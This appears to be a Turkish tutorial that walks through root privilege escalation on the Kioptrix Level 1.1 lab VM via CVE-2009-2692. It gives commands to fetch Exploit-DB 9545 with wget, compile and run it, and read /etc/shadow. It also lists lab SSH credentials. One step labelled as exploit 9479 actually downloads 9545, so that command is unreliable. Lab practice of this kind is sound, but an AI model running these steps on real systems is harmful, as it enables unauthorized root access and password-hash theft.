CentOS 4.5 – Linux Kernel 2.6.9.55 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (sock_sendpage()) İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, Linux Kernel 2.6.9-55 çekirdeğine ve CentOS 4.5 işletim sistemine sahip Kioptrix: Seviye – 1.1 (#2) sanal makinesi üzerinde çalışan bir zafiyet (CVE-2009-2692) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Yazıda kullanılan Kioptrix: Seviye – 1.1 (#2) sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında Centos 4.5 kullanıldığı ve Linux çekirdek sürümünün 2.6.9-55 olduğu görülmektedir.

uname -a
cat /etc/redhat-release

 

Linux Kernel 2.6.9-55’te birçok kritik zafiyet bulunmaktadır.

searchsploit Linux Kernel -t 2.6.| grep -v “/dos/”

 

Bu zafiyete ait istismar kodlarının en önemlilerinden biri de Exploit-db’de 9545 numaralı istismar kodudur.

 

CVE-2009-2692 ID’li bu zafiyet soket işlemlerindeki proto_ops yapısında bulunan işaretçilerin (pointer) ilklendirilmemesinden, referans gösterilmemesinden kaynaklanmaktadır. Bu zafiyet ile Linux’un 2.6.0 – 2.6.30.4 ve 2.4.4 – 2.4.37.4 arasındaki sürümlerine sahip sistemler istismar edilebilemekte ve hak yükseltilebilmektedir.

https://www.exploit-db.com/exploits/9545/
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) – ‘sock_sendpage()’ Privilege Escalation

 

Not: Aynı istismar kodu Security Focus sitesinden de indirilebilirdi.

http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c

 

Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.

pwd
ls
wget https://www.exploit-db.com/download/9545 –no-check-certificate -O IstismarKaynakKodu.c
ls -la

 

İstismar kodu derlenir.

gcc -Wall IstismarKaynakKodu.c -o HakYukseltme
ls -la

Bir diğer derleme yöntemi de aşağıdaki gibidir.

gcc -m32 -Wl,–hash-style=both IstismarKaynakKodu.c -o HakYukseltme

 

Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./HakYukseltme
id
head -3 /etc/shadow

 

Not: Aynı zafiyete ait bir başka istismar kodu olarakExploit-db’deki  9479 ID’li istismar kodu da kullanılabilirdi. Ancak bu kod ile istismar denemesi yapıldığında bazı durumlarda hedef işletim sistemi çökebilmektedir.

https://www.exploit-db.com/exploits/9479/
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) – ‘sock_sendpage()’ Ring0 Privilege Escalation (5)

 

Bunun yanında bazı durumlarda ise, hata alınmadan istismar işlemi başarılı olmaktadır.

wget https://www.exploit-db.com/download/9545 –no-check-certificate -O IstismarKaynakKodu_9479.c
gcc IstismarKaynakKodu_9479.c -o HakYukseltme_9479
ls -la
./HakYukseltme_9479

 

Belirtilen / benzer zafiyetin (9641) bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:

• pWnOS: 1.0: https://www.vulnhub.com/entry/pwnos-10,33/
  • SSH (22) Kimlik Bilgileri: vmware / h4ckm3

 

Kaynak:

http://pjhartlieb.blogspot.com.tr/2012/02/solving-kioptrix-level-2-part-44.html

Kioptrix Level 2

https://blog.techorganic.com/2012/07/06/kioptrix-hacking-challenge-part-2/